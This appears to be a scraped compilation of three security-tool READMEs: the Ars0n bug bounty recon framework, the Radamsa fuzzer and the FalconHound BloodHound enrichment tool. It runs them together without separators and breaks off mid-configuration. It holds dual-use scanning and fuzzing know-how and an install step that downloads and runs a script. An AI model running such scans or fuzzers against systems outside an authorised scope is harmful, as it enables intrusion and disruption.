Howdy! My name is Harrison Richardson, or rs0n
(arson) when I want to feel cooler than I really am. The code in this repository started as a small collection of scripts to help automate many of the common Bug Bounty hunting processes I found myself repeating. Over time, I built a simple web application with a MongoDB connection to manage my findings and identify valuable data points. After 5 years of Bug Bounty hunting, both part-time and full-time, I'm finally ready to package this collection of tools into a proper framework.
The Ars0n Framework is designed to provide aspiring Application Security Engineers with all the tools they need to leverage Bug Bounty hunting as a means to learn valuable, real-world AppSec concepts and make money doing it! My goal is to lower the barrier of entry for Bug Bounty hunting by providing easy-to-use automation tools in combination with educational content and how-to guides for a wide range of Web-based and Cloud-based vulnerabilities. In combination with my YouTube content, this framework will help aspiring Application Security Engineers quickly and easily understand real-world security concepts that directly translate to a high-paying career in Cyber Security.
In addition to using this tool for Bug Bounty Hunting, aspiring engineers can also use this GitHub Repository as a canvas to practice collaborating with other developers! This tool was inspired by Metasploit and designed to be modular in a similar way. Each Script (Ex: wildfire.py or slowburn.py) is basically an algorithm that runs the Modules (Ex: fire-starter.py or fire-scanner.py) in a specific pattern for a desired result. Because of this design, the community is free to build new Scripts to solve a specific use-case or Modules to expand the results of these Scripts. By learning the code in this framework and using GitHub to contribute your own code, aspiring engineers will continue to learn real-world skills that can be applied on the first day of a Security Engineer I position.
My hope is that this modular framework will act as a canvas to help share what I've learned over my career with the next generation of Security Engineers! Trust me, we need all the help we can get!!
Paste this code block into a clean installation of Kali Linux 2023.4 to download, install, and run the latest stable Alpha version of the framework:
sudo apt update && sudo apt-get update
sudo apt -y upgrade && sudo apt-get -y upgrade
wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz
cd ars0n-framework
./install.sh
The Ars0n Framework includes a script that installs all the necessary tools, packages, etc. that are needed to run the framework on a clean installation of Kali Linux 2023.4.
Please note that the only supported installation of this framework is on a clean installation of Kali Linux 2023.4. If you choose to try to run the framework outside of a clean Kali install, I will not be able to help troubleshoot if you have any issues.
./install.sh
This video shows exactly what to expect from a successful installation.
If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts
./install.sh --arm
You will be prompted to enter various API keys and tokens when the installation begins. Entering these is not required to run the core functionality of the framework. If you do not enter these API keys and tokens at the time of installation, simply hit enter at each of the prompts. The keys can be added later to the ~/.keys
directory. More information about how to add these keys manually can be found in the Frequently Asked Questions section of this README.
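As a purely hypothetical illustration (the actual file names and format are documented in the FAQ), adding a key manually could look roughly like this:
mkdir -p ~/.keys
echo "xxxxxxxxxxxxxxxx" > ~/.keys/shodan_api_key   # hypothetical file name -- see the FAQ for the real naming convention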
Once the installation is complete, you will be given the option to run the application by entering Y
. If you choose not to run the application immediately, or if you need to run the application after a reboot, simply navigate to the root directory and run the run.sh
bash script.
./run.sh
If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts
./run.sh --arm
The Ars0n Framework's Core Modules are used to determine the basic scanning logic. Each script is designed to support a specific recon methodology based on what the user is trying to accomplish.
At this time, the Wildfire script is the most widely used Core Module in the Ars0n Framework. The purpose of this module is to allow the user to scan multiple targets that allow for testing on any subdomain discovered by the researcher.
How it works:
Most Wildfire scans take between 8 and 48 hours to complete against a single domain if all Sub-Modules are being run. Variations in this timing can be caused by a number of factors, including the target application and the machine running the framework.
Also, please note that most data will not show in the GUI until the scan has completed. It's best to try and run the scan overnight or over a weekend, depending on the number of domains being scanned, and return once the scan has completed to move from Recon to Enumeration.
Running Wildfire:
Wildfire can be run from the GUI using the Wildfire button on the dashboard. Once clicked, the front-end will use the checkboxes on the screen to determine what flags should be passed to the scanner.
Please note that running scans from the GUI still has a few bugs and edge cases that haven't been sorted out. If you have any issues, you can simply run the scan from the CLI.
All Core Modules for The Ars0n Framework are stored in the /toolkit
directory. Simply navigate to the directory and run wildfire.py
with the necessary flags. At least one Sub-Module flag must be provided.
python3 wildfire.py --start --cloud --scan
Unlike the Wildfire module, which requires the user to identify target domains to scan, the Slowburn module does that work for you. By communicating with APIs for various bug bounty hunting platforms, this script will identify all domains that allow for testing on any discovered subdomain. Once the data has been populated, Slowburn will randomly choose one domain at a time to scan in the same way Wildfire does.
Please note that the Slowburn module is still in development and is not considered part of the stable alpha release. There will likely be bugs and edge cases encountered by the user.
In order for Slowburn to identify targets to scan, it must first be initialized. This initialization step collects the necessary data from various APIs and deposits it into a JSON file stored locally. Once this initialization step is complete, Slowburn will automatically begin selecting and scanning one target at a time.
To initialize Slowburn, simply run the following command:
python3 slowburn.py --initialize
Once the data has been collected, it is up to the user whether they want to re-initialize the tool upon the next scan.
Remember that the scope and targets on public bug bounty programs can change frequently. If you choose to run Slowburn without initializing the data, you may be scanning domains that are no longer in scope for the program. It is strongly recommended that Slowburn be re-initialized each time before running.
If you choose not to re-initialize the target data, you can run Slowburn using the previously collected data with the following command:
python3 slowburn.py
The Ars0n Framework's Sub-Modules are designed to be leveraged by the Core Modules to divide the Recon & Enumeration phases into specific tasks. The data collected in each Sub-Module is used by the others to expand your picture of the target's attack surface.
Fire-Starter is the first step to performing recon against a target domain. The goal of this script is to collect a wealth of information about the attack surface of your target. Once collected, this data will be used by all other Sub-Modules to help the user identify a specific URL that is potentially vulnerable.
Fire-Starter works by running a series of open-source tools to enumerate hidden subdomains, DNS records, and ASNs to identify where those external entries are hosted. Currently, Fire-Starter works by chaining together the following widely used open-source tools:
These tools cover a wide range of techniques to identify hidden subdomains, including web scraping, brute force, and crawling to identify links and JavaScript URLs.
Once the scan is complete, the Dashboard will be updated and available to the user.
Most Sub-Modules in The Ars0n Framework require the data collected from the Fire-Starter module to work. With this in mind, Fire-Starter must be included in the first scan against a target for any usable data to be collected.
Coming soon...
Fire-Scanner uses the results of Fire-Starter and Fire-Cloud to perform Wide-Band Scanning against all subdomains and cloud services that have been discovered from previous scans.
At this stage of development, this script leverages Nuclei almost exclusively for all scanning. Instead of simply running the tool, Fire-Scanner breaks the scan down into specific collections of Nuclei Templates and scans them one by one. This strategy helps ensure the scans are stable and produce consistent results, removes any unnecessary or unsafe scan checks, and produces actionable results.
The vast majority of issues installing and/or running the Ars0n Framework are caused by not installing the tool on a clean installation of Kali Linux.
It is important to remember that, at its core, the Ars0n Framework is a collection of automation scripts designed to run existing open-source tools. Each of these tools has its own way of operating and can experience unexpected behavior if conflicts emerge with any existing service/tool running on the user's system. This complexity is the reason why The Ars0n Framework should only be run on a clean installation of Kali Linux.
Another very common issue users experience is caused by MongoDB not successfully installing and/or running on their machine. The most common manifestation of this issue is that the user is unable to add an initial FQDN and simply sees a broken GUI. If this occurs, please ensure that your machine has the necessary system requirements to run MongoDB. Unfortunately, there is no current solution if you run into this issue.
Coming soon...
Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestingly different outputs from them. The main selling points of radamsa are that it has already found a slew of bugs in programs that actually matter, it is easily scriptable and easy to get up and running.
$ # please please please fuzz your programs. here is one way to get data for it:
$ sudo apt-get install gcc make git wget
$ git clone https://gitlab.com/akihe/radamsa.git && cd radamsa && make && sudo make install
$ echo "HAL 9000" | radamsa
Programming is hard. All nontrivial programs have bugs in them. What's more, even the simplest typical mistakes are, in some of the most widely used programming languages, usually enough for attackers to gain undesired powers.
Fuzzing is one of the techniques to find such unexpected behavior from programs. The idea is simply to subject the program to various kinds of inputs and see what happens. There are two parts in this process: getting the various kinds of inputs and seeing what happens. Radamsa is a solution to the first part, and the second part is typically a short shell script. Testers usually have a more or less vague idea of what should not happen, and they try to find out if this is so. This kind of testing is often referred to as negative testing, being the opposite of positive unit or integration testing. Developers know a service should not crash, should not consume exponential amounts of memory, should not get stuck in an infinite loop, etc. Attackers know that they can probably turn certain kinds of memory safety bugs into exploits, so they typically fuzz instrumented versions of the target programs and wait for such errors to be found. In theory, the idea is to disprove, by finding a counterexample, a theorem about the program stating that for all inputs something bad doesn't happen.
There are many kinds of fuzzers and ways to apply them. Some trace the target program and generate test cases based on the behavior. Some need to know the format of the data and generate test cases based on that information. Radamsa is an extremely "black-box" fuzzer, because it needs no information about the program nor the format of the data. One can pair it with coverage analysis during testing to likely improve the quality of the sample set during a continuous test run, but this is not mandatory. The main goal is to first get tests running easily, and then refine the technique applied if necessary.
Radamsa is intended to be a good general purpose fuzzer for all kinds of data. The goal is to be able to find issues no matter what kind of data the program processes, whether it's XML or MP3, and conversely that not finding bugs implies that other similar tools likely won't find them either. This is accomplished by having various kinds of heuristics and change patterns, which are varied during the tests. Sometimes there is just one change, sometimes there is a slew of them, sometimes there are bit flips, sometimes something more advanced and novel.
Radamsa is a side-product of OUSPG's Protos Genome Project, in which some techniques to automatically analyze and examine the structure of communication protocols were explored. A subset of one of the tools turned out to be a surprisingly effective file fuzzer. The first prototype black-box fuzzer tools mainly used regular and context-free formal languages to represent the inferred model of the data.
Supported operating systems:
* GNU/Linux
* OpenBSD
* FreeBSD
* Mac OS X
* Windows (using Cygwin)
Software requirements for building from sources:
* gcc / clang
* make
* git
* wget
$ git clone https://gitlab.com/akihe/radamsa.git
$ cd radamsa
$ make
$ sudo make install # optional, you can also just grab bin/radamsa
$ radamsa --help
Radamsa itself is just a single binary file which has no external dependencies. You can move it where you please and remove the rest.
This section assumes some familiarity with UNIX scripting.
Radamsa can be thought of as the cat UNIX tool, which manages to break the data in often interesting ways as it flows through. It also has support for generating more than one output at a time and acting as a TCP server or client, in case such things are needed.
Use of radamsa will be demonstrated by means of small examples. We will use the bc arbitrary precision calculator as an example target program.
In the simplest case, from a scripting point of view, radamsa can be used to fuzz data going through a pipe.
$ echo "aaa" | radamsa
aaaa
Here radamsa decided to add one 'a' to the input. Let's try that again.
$ echo "aaa" | radamsa
Λaaa
Now we got another result. By default radamsa will grab a random seed from /dev/urandom if it is not given a specific random state to start from, and you will generally see a different result every time it is started, though for small inputs you might see the same or the original fairly often. The random state to use can be given with the -s parameter, which is followed by a number. Using the same random state will result in the same data being generated.
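For example, two runs with the same seed and the same input produce identical output:
$ echo "aaa" | radamsa --seed 42 > out-1
$ echo "aaa" | radamsa --seed 42 > out-2
$ diff out-1 out-2   # no differences -- same random state, same result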
$ echo "Fuzztron 2000" | radamsa --seed 4
Fuzztron 4294967296
This particular example was chosen because radamsa happens to choose to use a number mutator, which replaces textual numbers with something else. Programmers might recognize why for example this particular number might be an interesting one to test for.
You can generate more than one output by using the -n parameter as follows:
$ echo "1 + (2 + (3 + 4))" | radamsa --seed 12 -n 4
1 + (2 + (2 + (3 + 4?)
1 + (2 + (3 +?4))
18446744073709551615 + 4)))
1 + (2 + (3 + 170141183460469231731687303715884105727))
There is no guarantee that all of the outputs will be unique. However, when using nontrivial samples, equal outputs tend to be extremely rare.
What we have so far can be used, for example, to test programs that read input from standard input, as in
$ echo "100 * (1 + (2 / 3))" | radamsa -n 10000 | bc
[...]
(standard_in) 1418: illegal character: ^_
(standard_in) 1422: syntax error
(standard_in) 1424: syntax error
(standard_in) 1424: memory exhausted
[hang]
Or the compiler used to compile Radamsa:
$ echo '((lambda (x) (+ x 1)) #x124214214)' | radamsa -n 10000 | ol
[...]
> What is 'ó µ'?
4901126677
> $
Or to test decompression:
$ gzip -c /bin/bash | radamsa -n 1000 | gzip -d > /dev/null
Typically, however, one might want a separate run of the program for each output. Basic shell scripting makes this easy. Usually we want a test script to run continuously, so we'll use an infinite loop here:
$ gzip -c /bin/bash > sample.gz
$ while true; do radamsa sample.gz | gzip -d > /dev/null; done
Notice that we are here giving the sample as a file instead of running Radamsa in a pipe. Like cat, Radamsa will by default write the output to stdout, but unlike cat, when given more than one file it will usually use only one or a few of them to create one output. This test will go about throwing fuzzed data against gzip, but doesn't care what happens then. One simple way to find out if something bad happened to a (simple single-threaded) program is to check whether the exit value is greater than 127, which would indicate a fatal program termination. This can be done for example as follows:
$ gzip -c /bin/bash > sample.gz
$ while true
do
radamsa sample.gz > fuzzed.gz
gzip -dc fuzzed.gz > /dev/null
test $? -gt 127 && break
done
This will run for as long as it takes to crash gzip, which hopefully is no longer even possible, and the fuzzed.gz can be used to check the issue if the script has stopped. We have found a few such cases, the last one of which took about 3 months to find, but all of them have as usual been filed as bugs and have been promptly fixed by the upstream.
One thing to note is that since most of the outputs are based on data in the given samples (standard input or files given at command line) it is usually a good idea to try to find good samples, and preferably more than one of them. In a more real-world test script radamsa will usually be used to generate more than one output at a time based on tens or thousands of samples, and the consequences of the outputs are tested mostly in parallel, often by giving each of the outputs on the command line to the target program. We'll make a simple such script for bc, which accepts files from command line. The -o flag can be used to give a file name to which radamsa should write the output instead of standard output. If more than one output is generated, the path should have a %n in it, which will be expanded to the number of the output.
$ echo "1 + 2" > sample-1
$ echo "(124 % 7) ^ 1*2" > sample-2
$ echo "sqrt((1 + length(10^4)) * 5)" > sample-3
$ bc sample-* < /dev/null
3
10
5
$ while true
do
radamsa -o fuzz-%n -n 100 sample-*
bc fuzz-* < /dev/null
test $? -gt 127 && break
done
This will again run until something obviously interesting happens, as indicated by the large exit value, or until the target program gets stuck.
In practice many programs fail in unique ways. Some common ways to catch obvious errors are to check the exit value, enable fatal signal printing in kernel and checking if something new turns up in dmesg, run a program under strace, gdb or valgrind and see if something interesting is caught, check if an error reporter process has been started after starting the program, etc.
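As a rough sketch of one such setup (assuming valgrind is installed, and reusing the gzip sample from above), a run can be stopped as soon as valgrind reports a memory error:
$ gzip -c /bin/bash > sample.gz
$ while true
do
radamsa sample.gz > fuzzed.gz
# run the target under valgrind; exit code 99 means valgrind detected a memory error
valgrind --error-exitcode=99 gzip -dc fuzzed.gz > /dev/null 2> valgrind.log
test $? -eq 99 && break
done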
The examples above all either wrote to standard output or files. One can also ask radamsa to be a TCP client or server by using a special parameter to -o. The output patterns are:
-o argument | meaning | example |
---|---|---|
:port | act as a TCP server in given port | # radamsa -o :80 -n inf samples/*.http-resp |
ip:port | connect as TCP client to port of ip | $ radamsa -o 127.0.0.1:80 -n inf samples/*.http-req |
- | write to stdout | $ radamsa -o - samples/*.vt100 |
path | write to files, %n is testcase # and %s the first suffix | $ radamsa -o test-%n.%s -n 100 samples/*.foo |
Remember that you can use e.g. tcpflow to record TCP traffic to files, which can then be used as samples for radamsa.
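For example, flows on port 80 could be captured to individual files roughly like this (eth0 is a placeholder interface; tcpflow usually needs elevated privileges to sniff):
$ # capture each TCP flow direction on port 80 to its own file in the current directory
$ sudo tcpflow -i eth0 port 80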
A non-exhaustive list of free complementary tools:
A non-exhaustive list of related free tools:
* American fuzzy lop (http://lcamtuf.coredump.cx/afl/)
* Zzuf (http://caca.zoy.org/wiki/zzuf)
* Bunny the Fuzzer (http://code.google.com/p/bunny-the-fuzzer/)
* Peach (http://peachfuzzer.com/)
* Sulley (http://code.google.com/p/sulley/)
Tools which are intended to improve security are usually complementary and should be used in parallel to improve the results. Radamsa aims to be an easy-to-set-up general purpose shotgun test to expose the easiest (and often severe due to being reachable via input streams) cracks which might be exploitable by getting the program to process malicious data. It has also turned out to be useful for catching regressions when combined with continuous automatic testing.
A robustness testing tool is obviously only good if it really can find non-trivial issues in real-world programs. Being a University-based group, we have tried to formulate some more scientific approaches to define what a 'good fuzzer' is, but real users are more likely to be interested in whether a tool has found something useful. We do not have anyone at OUSPG running tests or even developing Radamsa full-time, but we obviously do make occasional test-runs, both to assess the usefulness of the tool, and to help improve robustness of the target programs. For the test-runs we try to select programs that are mature, useful to us, widely used, and, preferably, open source and/or tend to process data from outside sources.
The list below has some CVEs we know of that have been found by using Radamsa. Some of the results are from our own test runs, and some have been kindly provided by CERT-FI from their tests and other users. As usual, please note that CVEs should be read as 'product X is now more robust (against Y)'.
CVE | program | credit |
---|---|---|
CVE-2007-3641 | libarchive | OUSPG |
CVE-2007-3644 | libarchive | OUSPG |
CVE-2007-3645 | libarchive | OUSPG |
CVE-2008-1372 | bzip2 | OUSPG |
CVE-2008-1387 | ClamAV | OUSPG |
CVE-2008-1412 | F-Secure | OUSPG |
CVE-2008-1837 | ClamAV | OUSPG |
CVE-2008-6536 | 7-zip | OUSPG |
CVE-2008-6903 | Sophos Anti-Virus | OUSPG |
CVE-2010-0001 | Gzip | integer underflow in unlzw |
CVE-2010-0192 | Acroread | OUSPG |
CVE-2010-1205 | libpng | OUSPG |
CVE-2010-1410 | Webkit | OUSPG |
CVE-2010-1415 | Webkit | OUSPG |
CVE-2010-1793 | Webkit | OUSPG |
CVE-2010-2065 | libtiff | found by CERT-FI |
CVE-2010-2443 | libtiff | found by CERT-FI |
CVE-2010-2597 | libtiff | found by CERT-FI |
CVE-2010-2482 | libtiff | found by CERT-FI |
CVE-2011-0522 | VLC | found by Harry Sintonen |
CVE-2011-0181 | Apple ImageIO | found by Harry Sintonen |
CVE-2011-0198 | Apple Type Services | found by Harry Sintonen |
CVE-2011-0205 | Apple ImageIO | found by Harry Sintonen |
CVE-2011-0201 | Apple CoreFoundation | found by Harry Sintonen |
CVE-2011-1276 | Excel | found by Nicolas Grégoire of Agarri |
CVE-2011-1186 | Chrome | OUSPG |
CVE-2011-1434 | Chrome | OUSPG |
CVE-2011-2348 | Chrome | OUSPG |
CVE-2011-2804 | Chrome/pdf | OUSPG |
CVE-2011-2830 | Chrome/pdf | OUSPG |
CVE-2011-2839 | Chrome/pdf | OUSPG |
CVE-2011-2861 | Chrome/pdf | OUSPG |
CVE-2011-3146 | librsvg | found by Sauli Pahlman |
CVE-2011-3654 | Mozilla Firefox | OUSPG |
CVE-2011-3892 | Theora | OUSPG |
CVE-2011-3893 | Chrome | OUSPG |
CVE-2011-3895 | FFmpeg | OUSPG |
CVE-2011-3957 | Chrome | OUSPG |
CVE-2011-3959 | Chrome | OUSPG |
CVE-2011-3960 | Chrome | OUSPG |
CVE-2011-3962 | Chrome | OUSPG |
CVE-2011-3966 | Chrome | OUSPG |
CVE-2011-3970 | libxslt | OUSPG |
CVE-2012-0449 | Firefox | found by Nicolas Grégoire of Agarri |
CVE-2012-0469 | Mozilla Firefox | OUSPG |
CVE-2012-0470 | Mozilla Firefox | OUSPG |
CVE-2012-0457 | Mozilla Firefox | OUSPG |
CVE-2012-2825 | libxslt | found by Nicolas Grégoire of Agarri |
CVE-2012-2849 | Chrome/GIF | OUSPG |
CVE-2012-3972 | Mozilla Firefox | found by Nicolas Grégoire of Agarri |
CVE-2012-1525 | Acrobat Reader | found by Nicolas Grégoire of Agarri |
CVE-2012-2871 | libxslt | found by Nicolas Grégoire of Agarri |
CVE-2012-2870 | libxslt | found by Nicolas Grégoire of Agarri |
CVE-2012-4922 | tor | found by the Tor project |
CVE-2012-5108 | Chrome | OUSPG via NodeFuzz |
CVE-2012-2887 | Chrome | OUSPG via NodeFuzz |
CVE-2012-5120 | Chrome | OUSPG via NodeFuzz |
CVE-2012-5121 | Chrome | OUSPG via NodeFuzz |
CVE-2012-5145 | Chrome | OUSPG via NodeFuzz |
CVE-2012-4186 | Mozilla Firefox | OUSPG via NodeFuzz |
CVE-2012-4187 | Mozilla Firefox | OUSPG via NodeFuzz |
CVE-2012-4188 | Mozilla Firefox | OUSPG via NodeFuzz |
CVE-2012-4202 | Mozilla Firefox | OUSPG via NodeFuzz |
CVE-2013-0744 | Mozilla Firefox | OUSPG via NodeFuzz |
CVE-2013-1691 | Mozilla Firefox | OUSPG |
CVE-2013-1708 | Mozilla Firefox | OUSPG |
CVE-2013-4082 | Wireshark | found by cons0ul |
CVE-2013-1732 | Mozilla Firefox | OUSPG |
CVE-2014-0526 | Adobe Reader X/XI | Pedro Ribeiro (pedrib@gmail.com) |
CVE-2014-3669 | PHP | |
CVE-2014-3668 | PHP | |
CVE-2014-8449 | Adobe Reader X/XI | Pedro Ribeiro (pedrib@gmail.com) |
CVE-2014-3707 | cURL | Symeon Paraschoudis |
CVE-2014-7933 | Chrome | OUSPG |
CVE-2015-0797 | Mozilla Firefox | OUSPG |
CVE-2015-0813 | Mozilla Firefox | OUSPG |
CVE-2015-1220 | Chrome | OUSPG |
CVE-2015-1224 | Chrome | OUSPG |
CVE-2015-2819 | Sybase SQL | vah_13 (ERPScan) |
CVE-2015-2820 | SAP Afaria | vah_13 (ERPScan) |
CVE-2015-7091 | Apple QuickTime | Pedro Ribeiro (pedrib@gmail.com) |
CVE-2015-8330 | SAP PCo agent | Mathieu GELI (ERPScan) |
CVE-2016-1928 | SAP HANA hdbxsengine | Mathieu Geli (ERPScan) |
CVE-2016-3979 | SAP NetWeaver | @ret5et (ERPScan) |
CVE-2016-3980 | SAP NetWeaver | @ret5et (ERPScan) |
CVE-2016-4015 | SAP NetWeaver | @vah_13 (ERPScan) |
CVE-2016-9562 | SAP NetWeaver | @vah_13 (ERPScan) |
CVE-2017-5371 | SAP ASE OData | @vah_13 (ERPScan) |
CVE-2017-9843 | SAP NETWEAVER | @vah_13 (ERPScan) |
CVE-2017-9845 | SAP NETWEAVER | @vah_13 (ERPScan) |
CVE-2018-0101 | Cisco ASA WebVPN/AnyConnect | @saidelike (NCC Group) |
We would like to thank the Chromium project and Mozilla for analyzing, fixing and reporting further many of the above mentioned issues, CERT-FI for feedback and disclosure handling, and other users, projects and vendors who have responsibly taken care of uncovered bugs.
The following people have contributed to the development of radamsa in code, ideas, issues or otherwise.
Issues in Radamsa can be reported to the issue tracker. The tool is under development, but we are glad to get error reports even for known issues to make sure they are not forgotten.
You can also drop by at #radamsa on Freenode if you have questions or feedback.
Issues in your programs should be fixed. If Radamsa finds them quickly (say, in an hour or a day) chances are that others will too.
Issues in other programs written by others should be dealt with responsibly. Even fairly simple errors can turn out to be exploitable, especially in programs written in low-level languages. In case you find something potentially severe, like an easily reproducible crash, and are unsure what to do with it, ask the vendor or project members, or your local CERT.
Q: If I find a bug with radamsa, do I have to mention the tool?
A: No.
Q: Will you make a graphical version of radamsa?
A: No. The intention is to keep it simple and scriptable for use in automated regression tests and continuous testing.
Q: I can't install! I don't have root access on the machine!
A: You can omit the $ make install part and just run radamsa from bin/radamsa in the build directory, or copy it somewhere else and use from there.
Q: Radamsa takes several GB of memory to compile!1
A: This is most likely due to an issue with your C compiler. Use prebuilt images or try the quick build instructions in this page.
Q: Radamsa does not compile using the instructions in this page!
A: Please file an issue at https://gitlab.com/akihe/radamsa/issues/new if you don't see a similar one already filed, send email (aohelin@gmail.com) or IRC (#radamsa on freenode).
Q: I used fuzzer X and found much more bugs from program Y than Radamsa did.
A: Cool. Let me know about it (aohelin@gmail.com) and I'll try to hack something X-ish to radamsa if it's general purpose enough. It'd also be useful to get some samples which you used to check how well radamsa does, because it might be overfitting some heuristic.
Q: Can I get support for using radamsa?
A: You can send email to aohelin@gmail.com or check if some of us happen to be hanging around at #radamsa on freenode.
Q: Can I use radamsa on Windows?
A: An experimental Windows executable is now in Downloads, but we have usually not tested it properly since we rarely use Windows internally. Feel free to file an issue if something is broken.
Q: How can I install radamsa?
A: Grab a binary from downloads and run it, or $ make && sudo make install.
Q: How can I uninstall radamsa?
A: Remove the binary you grabbed from downloads, or $ sudo make uninstall.
Q: Why are many outputs generated by Radamsa equal?
A: Radamsa doesn't keep track which outputs it has already generated, but instead relies on varying mutations to keep the output varying enough. Outputs can often be the same if you give a few small samples and generate lots of outputs from them. If you do spot a case where lots of equal outputs are generated, we'd be interested in hearing about it.
Q: There are lots of command line options. Which should I use for best results?
A: The recommended use is $ radamsa -o output-%n.foo -n 100 samples/*.foo, which is also what is used internally at OUSPG. It's usually best and most future proof to let radamsa decide the details.
Q: How can I make radamsa faster?
A: Radamsa typically writes a few megabytes of output per second. If you enable only simple mutations, e.g. -m bf,bd,bi,br,bp,bei,bed,ber,sr,sd, you will get about 10x faster output.
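For example, combined with the recommended output pattern from the earlier answer:
$ radamsa -m bf,bd,bi,br,bp,bei,bed,ber,sr,sd -o output-%n.foo -n 100 samples/*.foo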
Q: What's with the funny name?
A: It's from a scene in a Finnish children's story. You've probably never heard about it.
Q: Is this the last question?
A: Yes.
Use of data generated by radamsa, especially when targeting buggy programs running with high privileges, can result in arbitrarily bad things happening. A typical unexpected issue is caused by a file manager, automatic indexer or antivirus scanner trying to do something to fuzzed data before it is tested intentionally. We have seen spontaneous reboots, system hangs, file system corruption, loss of data, and other nastiness. When in doubt, use a disposable system, throwaway profile, chroot jail, sandbox, separate user account, or an emulator.
Not safe when used as prescribed.
This product may contain faint traces of parenthesis.
FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.
One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.
One of the hardest relationships to gather for BloodHound is the local group memberships and the session information. As blue teamers, we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.
This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.
Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.
Other examples where FalconHound can be used:
The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.
A blog detailing more on why we developed it and some use case examples can be found here
FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.
Currently, FalconHound supports the following data sources and/or targets:
Additional data sources and targets are planned for the future.
At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.
Since FalconHound is written in Go, there is no installation required. Just download the binary from the releases section and run it. Compiled binaries are available for Windows, Linux and MacOS.
Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to create all credentials can be found here.
The recommended way to run FalconHound is to run it as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.
FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.
To run FalconHound, just run the binary and add the -go
parameter to have it run all queries in the actions folder.
./falconhound -go
To list all enabled actions, use the -actionlist
parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go
parameter.
./falconhound -actionlist -go
To run a select set of actions, use the -ids
parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go
parameter.
./falconhound -ids action1,action2,action3 -go
By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config
flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.
./falconhound -go -config /path/to/config.yml
By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir
flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.
./falconhound -go -actions-dir /path/to/actions
By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault
flag FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault it will fall back to the config file.
./falconhound -go -keyvault
Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file and is stored in the directory of the source of the information, the query target. The filename is used as the name of the action.
The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.
The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.
All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.
There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.
While most items will be fairly self-explanatory, there are some important things to note about actions:
As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.
Enabled: true
This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.
Debug: false
The Query
field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your SourcePlatform
. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.
Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:
MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription)
RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}
Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name
and Enabled
fields. The Name
field is used to identify the target. The Enabled
field is used to enable or disable the target. If this is set to false, the target will be ignored.
- Name: CSV
Enabled: true
Path: path/to/filename.csv
The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore it requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The ReplacementFields
fields are configured below.
- Name: Neo4j
Enabled: true
Query: |
MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound'
Parameters:
Computer: Computer
TargetUserSid: TargetUserSid
Timestamp: Timestamp
The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name
syntax.
The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
This is also why query output needs to be controlled; you might otherwise flood your target.
- Name: Sentinel
Enabled: true
